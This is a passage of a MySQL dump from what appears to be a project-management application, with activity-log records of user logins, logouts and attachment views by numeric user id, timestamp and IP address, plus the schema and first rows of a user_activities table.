09:20:06','183.173.133.30'),(33765,208,'Login',208,'2021-03-06 09:27:42','2021-03-06 09:27:42','180.101.230.152'),(33766,171,'Login',171,'2021-03-06 10:03:33','2021-03-06 10:03:33','222.186.101.71'),(33767,209,'Login',209,'2021-03-06 10:06:28','2021-03-06 10:06:28','114.234.242.2'),(33768,189,'Login',189,'2021-03-06 18:08:46','2021-03-06 18:08:46',NULL),(33769,207,'Attachment',1176,'2021-03-06 18:31:34','2021-03-06 18:31:34',NULL),(33770,207,'Attachment',1178,'2021-03-06 18:31:34','2021-03-06 18:31:34',NULL),(33771,207,'Attachment',1177,'2021-03-06 18:31:34','2021-03-06 18:31:34',NULL),(33772,207,'Attachment',1351,'2021-03-06 18:31:34','2021-03-06 18:31:34',NULL),(33773,210,'Login',210,'2021-03-06 11:58:49','2021-03-06 11:58:49','111.186.52.47'),(33774,189,'Login',189,'2021-03-06 20:31:51','2021-03-06 20:31:51',NULL),(33775,156,'Attachment',1176,'2021-03-06 23:12:44','2021-03-06 23:12:44',NULL),(33776,156,'Attachment',1178,'2021-03-06 23:12:44','2021-03-06 23:12:44',NULL),(33777,156,'Attachment',1177,'2021-03-06 23:12:44','2021-03-06 23:12:44',NULL),(33778,156,'Attachment',1351,'2021-03-06 23:12:45','2021-03-06 23:12:45',NULL),(33779,2,'Attachment',265,'2021-03-07 00:36:23','2021-03-07 00:36:23',NULL),(33780,162,'Login',162,'2021-03-07 09:46:23','2021-03-07 09:46:23','123.121.182.119'),(33781,162,'Attachment',1176,'2021-03-07 17:58:12','2021-03-07 17:58:12',NULL),(33782,162,'Attachment',1177,'2021-03-07 17:58:12','2021-03-07 17:58:12',NULL),(33783,162,'Attachment',1351,'2021-03-07 17:58:12','2021-03-07 17:58:12',NULL),(33784,162,'Attachment',1178,'2021-03-07 17:58:12','2021-03-07 17:58:12',NULL),(33785,211,'Login',211,'2021-03-07 15:22:41','2021-03-07 15:22:41','116.6.234.149'),(33786,211,'Attachment',1176,'2021-03-07 23:26:22','2021-03-07 23:26:22',NULL),(33787,211,'Attachment',1178,'2021-03-07 23:26:24','2021-03-07 23:26:24',NULL),(33788,211,'Attachment',1351,'2021-03-07 23:26:24','2021-03-07 23:26:24',NULL),(33789,211,'Attachment',1177,'2021-03-07 23:26:24','2021-03-07 23:26:24',NULL),(33790,2,'Attachment',1176,'2021-03-08 09:42:03','2021-03-08 09:42:03',NULL),(33791,2,'Attachment',1177,'2021-03-08 09:42:03','2021-03-08 09:42:03',NULL),(33792,2,'Attachment',1178,'2021-03-08 09:42:03','2021-03-08 09:42:03',NULL),(33793,2,'Attachment',1351,'2021-03-08 09:42:03','2021-03-08 09:42:03',NULL),(33794,208,'Attachment',1176,'2021-03-08 09:42:52','2021-03-08 09:42:52',NULL),(33795,208,'Attachment',1177,'2021-03-08 09:42:52','2021-03-08 09:42:52',NULL),(33796,208,'Attachment',1178,'2021-03-08 09:42:52','2021-03-08 09:42:52',NULL),(33797,208,'Attachment',1351,'2021-03-08 09:42:52','2021-03-08 09:42:52',NULL),(33798,122,'Logout',122,'2021-03-08 01:45:05','2021-03-08 01:45:05','223.104.217.133'),(33799,156,'Login',156,'2021-03-08 01:45:36','2021-03-08 01:45:36','223.104.217.133'),(33800,156,'Logout',156,'2021-03-08 01:45:52','2021-03-08 01:45:52','223.104.217.133'),(33801,208,'Attachment',505,'2021-03-08 09:46:46','2021-03-08 09:46:46',NULL),(33802,208,'Attachment',938,'2021-03-08 09:48:35','2021-03-08 09:48:35',NULL),(33803,137,'Login',137,'2021-03-08 01:57:57','2021-03-08 01:57:57','101.206.170.245'),(33804,156,'Login',156,'2021-03-08 02:47:43','2021-03-08 02:47:43','223.104.218.241'),(33805,2,'Attachment',571,'2021-03-08 12:35:19','2021-03-08 12:35:19',NULL),(33806,189,'Login',189,'2021-03-08 14:14:40','2021-03-08 14:14:40',NULL),(33807,181,'Attachment',1178,'2021-03-08 14:49:54','2021-03-08 14:49:54',NULL),(33808,181,'Attachment',1351,'2021-03-08 14:49:54','2021-03-08 14:49:54',NULL),(33809,181,'Attachment',1176,'2021-03-08 14:49:54','2021-03-08 14:49:54',NULL),(33810,181,'Attachment',1177,'2021-03-08 14:49:54','2021-03-08 14:49:54',NULL),(33811,48,'Login',48,'2021-03-08 15:05:53','2021-03-08 15:05:53',NULL),(33812,48,'Logout',48,'2021-03-08 15:06:27','2021-03-08 15:06:27',NULL),(33813,48,'Login',48,'2021-03-08 15:06:42','2021-03-08 15:06:42',NULL),(33814,48,'Logout',48,'2021-03-08 07:12:03','2021-03-08 07:12:03','118.249.190.54'),(33815,48,'Login',48,'2021-03-08 07:12:20','2021-03-08 07:12:20','118.249.190.54'),(33816,48,'Logout',48,'2021-03-08 07:12:23','2021-03-08 07:12:23','118.249.190.54'),(33817,48,'Login',48,'2021-03-08 15:13:47','2021-03-08 15:13:47',NULL),(33818,48,'Logout',48,'2021-03-08 17:07:44','2021-03-08 17:07:44',NULL),(33819,48,'Login',48,'2021-03-08 17:08:01','2021-03-08 17:08:01',NULL),(33820,48,'Logout',48,'2021-03-08 17:23:43','2021-03-08 17:23:43',NULL),(33821,48,'Login',48,'2021-03-08 17:24:15','2021-03-08 17:24:15',NULL),(33822,48,'Logout',48,'2021-03-08 17:32:14','2021-03-08 17:32:14',NULL),(33823,48,'Login',48,'2021-03-08 17:32:24','2021-03-08 17:32:24',NULL),(33824,48,'Logout',48,'2021-03-08 17:36:03','2021-03-08 17:36:03',NULL),(33825,48,'Login',48,'2021-03-08 09:36:16','2021-03-08 09:36:16','118.249.190.54'),(33826,2,'Attachment',260,'2021-03-09 09:17:21','2021-03-09 09:17:21',NULL),(33827,1,'Attachment',1176,'2021-03-09 09:22:59','2021-03-09 09:22:59',NULL),(33828,1,'Attachment',1351,'2021-03-09 09:22:59','2021-03-09 09:22:59',NULL),(33829,1,'Attachment',1177,'2021-03-09 09:22:59','2021-03-09 09:22:59',NULL),(33830,1,'Attachment',1178,'2021-03-09 09:23:00','2021-03-09 09:23:00',NULL),(33831,48,'Login',48,'2021-03-09 01:36:21','2021-03-09 01:36:21','118.249.190.54'),(33832,2,'Attachment',1178,'2021-03-09 10:40:29','2021-03-09 10:40:29',NULL),(33833,2,'Attachment',1177,'2021-03-09 10:40:29','2021-03-09 10:40:29',NULL),(33834,2,'Attachment',1351,'2021-03-09 10:40:29','2021-03-09 10:40:29',NULL),(33835,2,'Attachment',1176,'2021-03-09 10:40:29','2021-03-09 10:40:29',NULL),(33836,156,'Login',156,'2021-03-09 03:41:27','2021-03-09 03:41:27','223.104.218.121'),(33837,189,'Login',189,'2021-03-09 11:57:27','2021-03-09 11:57:27',NULL),(33838,189,'Logout',189,'2021-03-09 11:58:12','2021-03-09 11:58:12',NULL),(33839,189,'Login',189,'2021-03-09 11:58:22','2021-03-09 11:58:22',NULL),(33840,189,'Logout',189,'2021-03-09 12:04:50','2021-03-09 12:04:50',NULL),(33841,1,'Attachment',757,'2021-03-09 12:14:26','2021-03-09 12:14:26',NULL),(33842,49,'Attachment',523,'2021-03-09 13:08:53','2021-03-09 13:08:53',NULL),(33843,156,'Login',156,'2021-03-09 13:38:57','2021-03-09 13:38:57',NULL),(33844,156,'Logout',156,'2021-03-09 05:40:00','2021-03-09 05:40:00','223.104.218.241'),(33845,128,'Logout',128,'2021-03-09 05:44:25','2021-03-09 05:44:25','203.218.94.244'),(33846,128,'Login',128,'2021-03-09 05:44:51','2021-03-09 05:44:51','203.218.94.244'),(33847,48,'Logout',48,'2021-03-09 13:45:40','2021-03-09 13:45:40',NULL),(33848,48,'Logout',48,'2021-03-09 06:16:11','2021-03-09 06:16:11','118.249.190.54'),(33849,133,'Login',133,'2021-03-09 06:16:23','2021-03-09 06:16:23','118.249.190.54'),(33850,211,'Login',211,'2021-03-09 15:47:29','2021-03-09 15:47:29',NULL),(33851,156,'Login',156,'2021-03-09 15:56:55','2021-03-09 15:56:55',NULL),(33852,212,'Login',212,'2021-03-09 08:02:28','2021-03-09 08:02:28','162.105.227.98'),(33853,212,'Attachment',1176,'2021-03-09 16:02:32','2021-03-09 16:02:32',NULL),(33854,212,'Attachment',1177,'2021-03-09 16:02:32','2021-03-09 16:02:32',NULL),(33855,212,'Attachment',1178,'2021-03-09 16:02:33','2021-03-09 16:02:33',NULL),(33856,212,'Attachment',1351,'2021-03-09 16:02:33','2021-03-09 16:02:33',NULL),(33857,213,'Login',213,'2021-03-09 08:21:59','2021-03-09 08:21:59','118.123.172.211'),(33858,48,'Login',48,'2021-03-09 08:24:38','2021-03-09 08:24:38','118.249.190.54'),(33859,2,'Attachment',1178,'2021-03-09 16:46:20','2021-03-09 16:46:20',NULL),(33860,2,'Attachment',1177,'2021-03-09 16:46:20','2021-03-09 16:46:20',NULL),(33861,2,'Attachment',1176,'2021-03-09 16:46:20','2021-03-09 16:46:20',NULL),(33862,2,'Attachment',1351,'2021-03-09 16:46:20','2021-03-09 16:46:20',NULL),(33863,214,'Login',214,'2021-03-09 08:46:32','2021-03-09 08:46:32','106.17.223.59'),(33864,215,'Login',215,'2021-03-09 13:52:43','2021-03-09 13:52:43','114.252.224.254'),(33865,215,'Attachment',1176,'2021-03-09 22:03:12','2021-03-09 22:03:12',NULL),(33866,215,'Attachment',1177,'2021-03-09 22:03:12','2021-03-09 22:03:12',NULL),(33867,215,'Attachment',1178,'2021-03-09 22:03:12','2021-03-09 22:03:12',NULL),(33868,215,'Attachment',1351,'2021-03-09 22:03:12','2021-03-09 22:03:12',NULL),(33869,215,'Attachment',571,'2021-03-09 22:03:29','2021-03-09 22:03:29',NULL),(33870,215,'Attachment',570,'2021-03-09 22:03:29','2021-03-09 22:03:29',NULL),(33871,215,'Attachment',569,'2021-03-09 22:03:29','2021-03-09 22:03:29',NULL),(33872,215,'Attachment',574,'2021-03-09 22:03:29','2021-03-09 22:03:29',NULL),(33873,215,'Attachment',572,'2021-03-09 22:03:30','2021-03-09 22:03:30',NULL),(33874,215,'Attachment',573,'2021-03-09 22:03:30','2021-03-09 22:03:30',NULL),(33875,215,'Attachment',575,'2021-03-09 22:03:30','2021-03-09 22:03:30',NULL),(33876,215,'Attachment',576,'2021-03-09 22:03:31','2021-03-09 22:03:31',NULL),(33877,128,'Logout',128,'2021-03-10 10:14:08','2021-03-10 10:14:08',NULL),(33878,128,'Login',128,'2021-03-10 10:14:22','2021-03-10 10:14:22',NULL),(33879,128,'Logout',128,'2021-03-10 02:14:48','2021-03-10 02:14:48','203.218.94.244'),(33880,128,'Login',128,'2021-03-10 02:15:38','2021-03-10 02:15:38','203.218.94.244'),(33881,128,'Logout',128,'2021-03-10 10:17:00','2021-03-10 10:17:00',NULL),(33882,128,'Login',128,'2021-03-10 10:17:09','2021-03-10 10:17:09',NULL),(33883,174,'Logout',174,'2021-03-10 05:15:30','2021-03-10 05:15:30','180.167.38.162'),(33884,174,'Login',174,'2021-03-10 05:15:41','2021-03-10 05:15:41','180.167.38.162'),(33885,174,'Logout',174,'2021-03-10 05:22:35','2021-03-10 05:22:35','180.167.38.162'),(33886,174,'Login',174,'2021-03-10 05:22:44','2021-03-10 05:22:44','180.167.38.162'),(33887,2,'Attachment',1176,'2021-03-10 14:47:20','2021-03-10 14:47:20',NULL),(33888,2,'Attachment',1177,'2021-03-10 14:47:20','2021-03-10 14:47:20',NULL),(33889,2,'Attachment',1178,'2021-03-10 14:47:20','2021-03-10 14:47:20',NULL),(33890,2,'Attachment',1351,'2021-03-10 14:47:20','2021-03-10 14:47:20',NULL),(33891,1,'Attachment',1351,'2021-03-10 15:35:24','2021-03-10 15:35:24',NULL),(33892,1,'Attachment',1178,'2021-03-10 15:35:24','2021-03-10 15:35:24',NULL),(33893,1,'Attachment',1177,'2021-03-10 15:35:24','2021-03-10 15:35:24',NULL),(33894,1,'Attachment',1176,'2021-03-10 15:35:24','2021-03-10 15:35:24',NULL),(33895,2,'Attachment',265,'2021-03-10 15:42:50','2021-03-10 15:42:50',NULL),(33896,49,'Attachment',1176,'2021-03-10 16:15:01','2021-03-10 16:15:01',NULL),(33897,49,'Attachment',1178,'2021-03-10 16:15:01','2021-03-10 16:15:01',NULL),(33898,49,'Attachment',1351,'2021-03-10 16:15:01','2021-03-10 16:15:01',NULL),(33899,49,'Attachment',1177,'2021-03-10 16:15:01','2021-03-10 16:15:01',NULL),(33900,160,'Login',160,'2021-03-10 08:43:23','2021-03-10 08:43:23','117.61.1.101'),(33901,1,'Attachment',1497,'2021-03-10 17:05:42','2021-03-10 17:05:42',NULL),(33902,1,'Attachment',1504,'2021-03-10 17:08:32','2021-03-10 17:08:32',NULL),(33903,216,'Login',216,'2021-03-10 10:04:18','2021-03-10 10:04:18','122.224.238.190'),(33904,2,'Attachment',1178,'2021-03-10 19:05:18','2021-03-10 19:05:18',NULL),(33905,2,'Attachment',1176,'2021-03-10 19:05:18','2021-03-10 19:05:18',NULL),(33906,2,'Attachment',1177,'2021-03-10 19:05:18','2021-03-10 19:05:18',NULL),(33907,2,'Attachment',1351,'2021-03-10 19:05:18','2021-03-10 19:05:18',NULL),(33908,215,'Login',215,'2021-03-10 20:17:15','2021-03-10 20:17:15',NULL),(33909,215,'Login',215,'2021-03-10 12:17:49','2021-03-10 12:17:49','114.252.224.254'),(33910,215,'Attachment',505,'2021-03-10 20:41:40','2021-03-10 20:41:40',NULL),(33911,2,'Attachment',1351,'2021-03-10 23:44:10','2021-03-10 23:44:10',NULL),(33912,2,'Attachment',1176,'2021-03-10 23:44:10','2021-03-10 23:44:10',NULL),(33913,2,'Attachment',1178,'2021-03-10 23:44:10','2021-03-10 23:44:10',NULL),(33914,2,'Attachment',1177,'2021-03-10 23:44:10','2021-03-10 23:44:10',NULL),(33915,217,'Login',217,'2021-03-10 23:03:10','2021-03-10 23:03:10','120.236.174.166'),(33916,217,'Login',217,'2021-03-10 23:04:41','2021-03-10 23:04:41','120.236.174.166'),(33917,217,'Attachment',1176,'2021-03-11 07:20:40','2021-03-11 07:20:40',NULL),(33918,217,'Attachment',1177,'2021-03-11 07:20:40','2021-03-11 07:20:40',NULL),(33919,217,'Attachment',1178,'2021-03-11 07:20:40','2021-03-11 07:20:40',NULL),(33920,217,'Attachment',1351,'2021-03-11 07:20:40','2021-03-11 07:20:40',NULL),(33921,217,'Attachment',570,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33922,217,'Attachment',569,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33923,217,'Attachment',571,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33924,217,'Attachment',573,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33925,217,'Attachment',572,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33926,217,'Attachment',574,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33927,217,'Attachment',575,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33928,217,'Attachment',576,'2021-03-11 07:20:57','2021-03-11 07:20:57',NULL),(33929,1,'Logout',1,'2021-03-11 08:36:31','2021-03-11 08:36:31',NULL),(33930,1,'Login',1,'2021-03-11 08:42:14','2021-03-11 08:42:14',NULL),(33931,55,'Login',55,'2021-03-11 00:57:53','2021-03-11 00:57:53','223.104.21.27'),(33932,181,'Attachment',1351,'2021-03-11 09:42:20','2021-03-11 09:42:20',NULL),(33933,181,'Attachment',1178,'2021-03-11 09:42:20','2021-03-11 09:42:20',NULL),(33934,181,'Attachment',1176,'2021-03-11 09:42:20','2021-03-11 09:42:20',NULL),(33935,181,'Attachment',1177,'2021-03-11 09:42:20','2021-03-11 09:42:20',NULL),(33936,2,'Attachment',1177,'2021-03-11 09:42:54','2021-03-11 09:42:54',NULL),(33937,2,'Attachment',1176,'2021-03-11 09:42:54','2021-03-11 09:42:54',NULL),(33938,2,'Attachment',1178,'2021-03-11 09:42:54','2021-03-11 09:42:54',NULL),(33939,2,'Attachment',1351,'2021-03-11 09:42:54','2021-03-11 09:42:54',NULL),(33940,1,'Attachment',757,'2021-03-11 09:43:22','2021-03-11 09:43:22',NULL),(33941,1,'Attachment',539,'2021-03-11 09:43:27','2021-03-11 09:43:27',NULL),(33942,2,'Attachment',1178,'2021-03-11 09:48:54','2021-03-11 09:48:54',NULL),(33943,2,'Attachment',1176,'2021-03-11 09:48:54','2021-03-11 09:48:54',NULL),(33944,2,'Attachment',1177,'2021-03-11 09:48:54','2021-03-11 09:48:54',NULL),(33945,2,'Attachment',1351,'2021-03-11 09:48:54','2021-03-11 09:48:54',NULL),(33946,133,'Logout',133,'2021-03-11 02:01:45','2021-03-11 02:01:45','118.249.190.54'),(33947,48,'Login',48,'2021-03-11 02:01:52','2021-03-11 02:01:52','118.249.190.54'),(33948,48,'Attachment',1177,'2021-03-11 10:19:39','2021-03-11 10:19:39',NULL),(33949,48,'Attachment',1176,'2021-03-11 10:19:39','2021-03-11 10:19:39',NULL),(33950,48,'Attachment',1178,'2021-03-11 10:19:39','2021-03-11 10:19:39',NULL),(33951,48,'Attachment',1351,'2021-03-11 10:19:39','2021-03-11 10:19:39',NULL),(33952,46,'Login',46,'2021-03-11 03:04:12','2021-03-11 03:04:12','124.202.223.214'),(33953,48,'Attachment',1176,'2021-03-11 11:22:37','2021-03-11 11:22:37',NULL),(33954,48,'Attachment',1178,'2021-03-11 11:22:37','2021-03-11 11:22:37',NULL),(33955,48,'Attachment',1177,'2021-03-11 11:22:37','2021-03-11 11:22:37',NULL),(33956,48,'Attachment',1351,'2021-03-11 11:22:37','2021-03-11 11:22:37',NULL),(33957,48,'Attachment',1176,'2021-03-11 11:30:38','2021-03-11 11:30:38',NULL),(33958,48,'Attachment',1178,'2021-03-11 11:30:38','2021-03-11 11:30:38',NULL),(33959,48,'Attachment',1177,'2021-03-11 11:30:38','2021-03-11 11:30:38',NULL),(33960,48,'Attachment',1351,'2021-03-11 11:30:38','2021-03-11 11:30:38',NULL),(33961,48,'Attachment',1177,'2021-03-11 11:30:54','2021-03-11 11:30:54',NULL),(33962,48,'Attachment',1176,'2021-03-11 11:30:54','2021-03-11 11:30:54',NULL),(33963,48,'Attachment',1178,'2021-03-11 11:30:54','2021-03-11 11:30:54',NULL),(33964,48,'Attachment',1351,'2021-03-11 11:30:54','2021-03-11 11:30:54',NULL),(33965,2,'Attachment',1176,'2021-03-11 12:41:24','2021-03-11 12:41:24',NULL),(33966,2,'Attachment',1351,'2021-03-11 12:41:24','2021-03-11 12:41:24',NULL),(33967,2,'Attachment',1177,'2021-03-11 12:41:24','2021-03-11 12:41:24',NULL),(33968,2,'Attachment',1178,'2021-03-11 12:41:24','2021-03-11 12:41:24',NULL),(33969,218,'Login',218,'2021-03-11 07:06:40','2021-03-11 07:06:40','58.200.129.204'),(33970,2,'Attachment',571,'2021-03-11 19:46:34','2021-03-11 19:46:34',NULL),(33971,2,'Attachment',24,'2021-03-11 20:04:37','2021-03-11 20:04:37',NULL),(33972,2,'Attachment',1351,'2021-03-11 20:08:28','2021-03-11 20:08:28',NULL),(33973,2,'Attachment',1178,'2021-03-11 20:08:28','2021-03-11 20:08:28',NULL),(33974,2,'Attachment',1177,'2021-03-11 20:08:28','2021-03-11 20:08:28',NULL),(33975,2,'Attachment',1176,'2021-03-11 20:08:28','2021-03-11 20:08:28',NULL),(33976,2,'Attachment',1176,'2021-03-12 00:27:46','2021-03-12 00:27:46',NULL),(33977,2,'Attachment',1178,'2021-03-12 00:27:46','2021-03-12 00:27:46',NULL),(33978,2,'Attachment',1351,'2021-03-12 00:27:46','2021-03-12 00:27:46',NULL),(33979,2,'Attachment',1177,'2021-03-12 00:27:46','2021-03-12 00:27:46',NULL),(33980,2,'Attachment',24,'2021-03-12 00:35:04','2021-03-12 00:35:04',NULL),(33981,135,'Login',135,'2021-03-12 09:47:38','2021-03-12 09:47:38',NULL),(33982,135,'Attachment',938,'2021-03-12 09:48:05','2021-03-12 09:48:05',NULL),(33983,216,'Attachment',1178,'2021-03-12 10:20:07','2021-03-12 10:20:07',NULL),(33984,216,'Attachment',1176,'2021-03-12 10:20:07','2021-03-12 10:20:07',NULL),(33985,216,'Attachment',1177,'2021-03-12 10:20:07','2021-03-12 10:20:07',NULL),(33986,216,'Attachment',1351,'2021-03-12 10:20:07','2021-03-12 10:20:07',NULL),(33987,2,'Attachment',1099,'2021-03-12 10:43:22','2021-03-12 10:43:22',NULL),(33988,164,'Login',164,'2021-03-12 05:24:21','2021-03-12 05:24:21','218.13.14.216'),(33989,219,'Login',219,'2021-03-12 12:38:11','2021-03-12 12:38:11','180.102.143.214'),(33990,219,'Logout',219,'2021-03-12 12:45:58','2021-03-12 12:45:58','180.102.143.214'),(33991,219,'Login',219,'2021-03-12 12:46:32','2021-03-12 12:46:32','180.102.143.214'),(33992,219,'Attachment',1176,'2021-03-12 20:46:39','2021-03-12 20:46:39',NULL),(33993,219,'Attachment',1178,'2021-03-12 20:46:39','2021-03-12 20:46:39',NULL),(33994,219,'Attachment',1177,'2021-03-12 20:46:39','2021-03-12 20:46:39',NULL),(33995,219,'Attachment',1351,'2021-03-12 20:46:39','2021-03-12 20:46:39',NULL),(33996,220,'Login',220,'2021-03-13 11:53:20','2021-03-13 11:53:20',NULL),(33997,219,'Login',219,'2021-03-13 05:16:43','2021-03-13 05:16:43','218.94.136.176'),(33998,219,'Attachment',1176,'2021-03-13 13:19:45','2021-03-13 13:19:45',NULL),(33999,219,'Attachment',1177,'2021-03-13 13:19:45','2021-03-13 13:19:45',NULL),(34000,219,'Attachment',1178,'2021-03-13 13:19:45','2021-03-13 13:19:45',NULL),(34001,219,'Attachment',1351,'2021-03-13 13:19:45','2021-03-13 13:19:45',NULL),(34002,221,'Login',221,'2021-03-13 06:47:44','2021-03-13 06:47:44','117.136.62.13'),(34003,221,'Attachment',1176,'2021-03-13 14:48:54','2021-03-13 14:48:54',NULL),(34004,221,'Attachment',1177,'2021-03-13 14:48:54','2021-03-13 14:48:54',NULL),(34005,221,'Attachment',1351,'2021-03-13 14:48:54','2021-03-13 14:48:54',NULL),(34006,221,'Attachment',1178,'2021-03-13 14:48:54','2021-03-13 14:48:54',NULL),(34007,2,'Attachment',265,'2021-03-13 16:18:51','2021-03-13 16:18:51',NULL),(34008,2,'Attachment',1176,'2021-03-13 19:32:57','2021-03-13 19:32:57',NULL),(34009,2,'Attachment',1177,'2021-03-13 19:32:57','2021-03-13 19:32:57',NULL),(34010,2,'Attachment',1178,'2021-03-13 19:32:57','2021-03-13 19:32:57',NULL),(34011,2,'Attachment',1351,'2021-03-13 19:32:57','2021-03-13 19:32:57',NULL),(34012,2,'Attachment',29,'2021-03-14 15:01:19','2021-03-14 15:01:19',NULL),(34013,192,'Login',192,'2021-03-15 02:24:04','2021-03-15 02:24:04','220.178.25.67'),(34014,2,'Attachment',1176,'2021-03-15 10:34:07','2021-03-15 10:34:07',NULL),(34015,2,'Attachment',1177,'2021-03-15 10:34:07','2021-03-15 10:34:07',NULL),(34016,2,'Attachment',1178,'2021-03-15 10:34:07','2021-03-15 10:34:07',NULL),(34017,2,'Attachment',1351,'2021-03-15 10:34:07','2021-03-15 10:34:07',NULL),(34018,48,'Login',48,'2021-03-15 11:06:37','2021-03-15 11:06:37',NULL),(34019,2,'Attachment',24,'2021-03-15 16:58:26','2021-03-15 16:58:26',NULL),(34020,2,'Attachment',571,'2021-03-16 00:16:03','2021-03-16 00:16:03',NULL),(34021,2,'Attachment',36,'2021-03-16 02:06:57','2021-03-16 02:06:57',NULL),(34022,2,'Attachment',542,'2021-03-16 03:37:09','2021-03-16 03:37:09',NULL),(34023,2,'Attachment',261,'2021-03-16 08:38:19','2021-03-16 08:38:19',NULL),(34024,2,'Attachment',36,'2021-03-16 09:35:01','2021-03-16 09:35:01',NULL),(34025,2,'Attachment',24,'2021-03-16 09:45:03','2021-03-16 09:45:03',NULL),(34026,2,'Attachment',1351,'2021-03-16 10:01:29','2021-03-16 10:01:29',NULL),(34027,2,'Attachment',1177,'2021-03-16 10:01:29','2021-03-16 10:01:29',NULL),(34028,2,'Attachment',1176,'2021-03-16 10:01:29','2021-03-16 10:01:29',NULL),(34029,2,'Attachment',1178,'2021-03-16 10:01:29','2021-03-16 10:01:29',NULL),(34030,2,'Attachment',29,'2021-03-16 10:53:15','2021-03-16 10:53:15',NULL),(34031,135,'Logout',135,'2021-03-16 10:57:21','2021-03-16 10:57:21',NULL),(34032,2,'Attachment',1177,'2021-03-16 13:59:15','2021-03-16 13:59:15',NULL),(34033,2,'Attachment',1351,'2021-03-16 13:59:15','2021-03-16 13:59:15',NULL),(34034,2,'Attachment',1178,'2021-03-16 13:59:15','2021-03-16 13:59:15',NULL),(34035,2,'Attachment',1176,'2021-03-16 13:59:15','2021-03-16 13:59:15',NULL),(34036,2,'Attachment',1176,'2021-03-19 08:53:13','2021-03-19 08:53:13',NULL),(34037,2,'Attachment',1178,'2021-03-19 08:53:14','2021-03-19 08:53:14',NULL),(34038,2,'Attachment',1351,'2021-03-19 08:53:14','2021-03-19 08:53:14',NULL),(34039,2,'Attachment',1177,'2021-03-19 08:53:14','2021-03-19 08:53:14',NULL),(34040,48,'Login',48,'2021-03-19 11:17:44','2021-03-19 11:17:44',NULL),(34041,48,'Login',48,'2021-03-19 03:18:28','2021-03-19 03:18:28','118.249.190.54'),(34042,48,'Login',48,'2021-03-19 03:18:46','2021-03-19 03:18:46','118.249.190.54'),(34043,48,'Login',48,'2021-03-19 03:19:18','2021-03-19 03:19:18','118.249.190.54'),(34044,48,'Login',48,'2021-03-19 11:31:41','2021-03-19 11:31:41',NULL);
|
||
/*!40000 ALTER TABLE `user_actions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_activities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_activities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_activities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`act_type` varchar(255) DEFAULT NULL,
|
||
`act_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `user_act_index` (`act_id`,`act_type`,`container_id`,`created_at`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=223 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_activities`
|
||
--
|
||
|
||
LOCK TABLES `user_activities` WRITE;
|
||
/*!40000 ALTER TABLE `user_activities` DISABLE KEYS */;
|
||
INSERT INTO `user_activities` VALUES (1,'Principal',1,'Principal',1,'2018-07-02 11:21:08','2018-07-02 11:21:08',1),(2,'Principal',2,'Principal',2,'2018-07-02 11:27:49','2018-07-02 11:27:49',2),(3,'Principal',3,'Principal',3,'2018-07-06 10:52:18','2018-07-06 10:52:18',3),(4,'Project',1,'Project',1,'2018-07-06 18:01:47','2018-07-06 18:01:47',1),(5,'Principal',4,'Principal',4,'2018-07-08 10:28:20','2018-07-08 10:28:20',4),(6,'Project',2,'Project',2,'2018-07-08 15:19:48','2018-07-08 15:19:48',1),(7,'Project',3,'Project',3,'2018-07-18 16:50:32','2018-07-18 16:50:32',1),(8,'Issue',1,'Project',3,'2018-07-18 16:50:44','2018-07-18 16:50:44',1),(9,'Principal',5,'Principal',5,'2018-07-20 09:16:40','2018-07-20 09:16:40',5),(10,'Principal',6,'Principal',6,'2018-07-20 14:47:43','2018-07-20 14:47:43',6),(11,'Principal',7,'Principal',7,'2018-07-30 09:39:16','2018-07-30 09:39:16',7),(12,'Principal',8,'Principal',8,'2018-08-03 19:28:18','2018-08-03 19:28:18',8),(13,'Principal',9,'Principal',9,'2018-08-06 15:18:46','2018-08-06 15:18:46',9),(14,'Principal',10,'Principal',10,'2018-08-06 15:24:58','2018-08-06 15:24:58',10),(15,'Principal',11,'Principal',11,'2018-08-21 17:13:35','2018-08-21 17:13:35',11),(16,'Principal',12,'Principal',12,'2018-08-22 15:59:03','2018-08-22 15:59:03',12),(17,'Principal',13,'Principal',13,'2018-08-30 22:28:07','2018-08-30 22:28:07',13),(18,'Principal',14,'Principal',14,'2018-09-05 13:54:44','2018-09-05 13:54:44',14),(19,'Principal',15,'Principal',15,'2018-09-07 12:37:19','2018-09-07 12:37:19',15),(20,'Principal',16,'Principal',16,'2018-10-10 09:29:20','2018-10-10 09:29:20',16),(21,'Principal',17,'Principal',17,'2018-10-12 17:36:42','2018-10-12 17:36:42',17),(22,'Principal',18,'Principal',18,'2018-12-19 09:06:30','2018-12-19 09:06:30',18),(23,'Principal',19,'Principal',19,'2019-01-15 09:36:50','2019-01-15 09:36:50',19),(24,'Principal',20,'Principal',20,'2019-01-18 09:54:22','2019-01-18 09:54:22',20),(25,'Principal',21,'Principal',21,'2019-01-25 11:44:49','2019-01-25 11:44:49',21),(26,'Principal',22,'Principal',22,'2019-01-25 11:44:49','2019-01-25 11:44:49',22),(27,'Principal',23,'Principal',23,'2019-01-25 11:44:49','2019-01-25 11:44:49',23),(28,'Principal',24,'Principal',24,'2019-01-25 11:44:49','2019-01-25 11:44:49',24),(29,'Principal',25,'Principal',25,'2019-01-25 11:44:50','2019-01-25 11:44:50',25),(30,'Principal',26,'Principal',26,'2019-01-25 11:44:50','2019-01-25 11:44:50',26),(31,'Principal',27,'Principal',27,'2019-01-25 11:44:50','2019-01-25 11:44:50',27),(32,'Principal',28,'Principal',28,'2019-01-25 11:44:50','2019-01-25 